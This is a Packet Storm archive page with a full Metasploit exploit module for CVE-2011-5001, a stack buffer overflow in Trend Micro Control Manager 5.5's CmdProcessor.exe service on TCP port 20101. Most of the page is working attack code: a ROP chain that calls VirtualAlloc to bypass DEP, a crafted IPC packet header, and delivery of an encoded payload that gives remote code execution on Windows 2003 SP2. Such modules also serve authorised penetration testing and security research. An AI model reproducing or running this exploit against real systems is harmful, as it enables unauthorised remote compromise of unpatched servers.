what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TrendMicro Control Manager 5.5 Buffer Overflow

TrendMicro Control Manager 5.5 Buffer Overflow
Posted Feb 24, 2012
Authored by blue, Luigi Auriemma | Site metasploit.com

This Metasploit module exploits a vulnerability in the CmdProcessor.exe component of Trend Micro Control Manager up to version 5.5. The specific flaw exists within CmdProcessor.exe service running on TCP port 20101. The vulnerable function is the CGenericScheduler::AddTask function of cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet, controlled data is copied into a 256-byte stack buffer. This can be exploited to execute remote code under the context of the user.

tags | exploit, remote, tcp
advisories | CVE-2011-5001, OSVDB-77585
SHA-256 | a04483c90d2ea44a263aa576ce03bb6bfbcf03f1fa5d6ff7e8b522c7b58f3163

TrendMicro Control Manager 5.5 Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Tcp

def initialize(info={})
super(update_info(info,
'Name' => "TrendMicro Control Manger <= v5.5 CmdProcessor.exe Stack Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability in the CmdProcessor.exe component of Trend
Micro Control Manger up to version 5.5.

The specific flaw exists within CmdProcessor.exe service running on TCP port
20101. The vulnerable function is the CGenericScheduler::AddTask function of
cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet,
controlled data is copied into a 256-byte stack buffer. This can be exploited
to execute remote code under the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', #Initial discovery
'Blue', #Metasploit
],
'References' =>
[
['CVE', '2011-5001'],
['OSVDB', '77585'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-345/']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => 'process',
},
'Platform' => 'win',
'Targets' =>
[
[
# TCM 5.5 cannot be installed in Win2k3 SP0-SP1, Win2k8, or XP
'Windows 2003 Server SP2 (DEP Bypass)',
{
'Ret' => 0x666b34c8, # TMNotify.dll stack pivot
'Offset' => 5000
}
],
],
'Privileged' => false,
'DisclosureDate' => "Dec 07 2011",
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(20101)
], self.class)
end

def junk
return rand_text(4).unpack("L")[0].to_i
end

def exploit

#TmUpdate.dll
rop_chain = [
0x668074d4, # POP EDX # OR AL,0F6 # RETN
0x3FCD0FFC, # Put 00001000 into edx
0x667611b2, # ADD EDX,C0330004 # RETN 04
0x667c99e7, # POP EBP # RETN [TmUpdate.dll]
junk,
0x667c99e7, # skip 4 bytes [TmUpdate.dll]
0x667e3250, # POP EBX # RETN [TmUpdate.dll]
0xffffffff, # NEG EBX
0x6683ab64, # INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
0x6683ab64, # INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
0x6680a1d3, # POP EAX # RETN [TmUpdate.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x66812b53, # NEG EAX # RETN [TmUpdate.dll]
0x667f030a, # MOV ECX,EAX # RETN [TmUpdate.dll]
0x667d4c7c, # POP EDI # RETN [TmUpdate.dll]
0x667e8003, # RETN (ROP NOP) [TmUpdate.dll]
0x667d54d0, # POP ESI # RETN [TmUpdate.dll]
0x667baf06, # JMP [EAX] [TmUpdate.dll]
0x66833376, # POP EAX # RETN [TmUpdate.dll]
0x6686115c, # ptr to &VirtualAlloc() [IAT TmUpdate.dll]
0x6681ceb3, # PUSHAD # RETN [TmUpdate.dll]
0x668382c3, # ptr to 'call esp' [TmUpdate.dll]
].pack('V*')
#rop chain generated by mona.py

header = "\x00\x00"
header << "\x13\x88" #size of buffer
header << rand_text_alpha(9)
header << "\x15\x09\x13" #opcode
header << "\x00\x00\x00"
header << rand_text_alpha(25)
header << "\xFE\xFF\xFF\xFF" #in instruction #MOV EDI,DWORD PTR DS:[EAX+ECX] #ECX is our buffer and needs to be readable dword
header << "\xFF\xFF\xFF\xFF" #after sum with EAX. Pointer from EAX increments by #LEA EAX,DWORD PTR DS:[EAX+EDI+4] and then is saved
header << "\xFF\xFF\xF4\xFF" #and used again. We can essentially walk the loop which increments EBX by 1 until we get to 14 which leads
header << "\xFF\xFF" #us to our vulnerable function
header << rand_text_alpha(1) #align stack again for rop

pay = rop_chain
pay << make_nops(374 - rop_chain.length)
pay << "\xeb\x04" #Short jmp 0x04
pay << [target.ret].pack('V')
pay << payload.encoded

sploit = header
sploit << pay

filler = rand_text_alpha(target['Offset'] - (sploit.length))

connect
print_status("Sending request...")
sock.put(sploit + filler)
handler
disconnect

end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close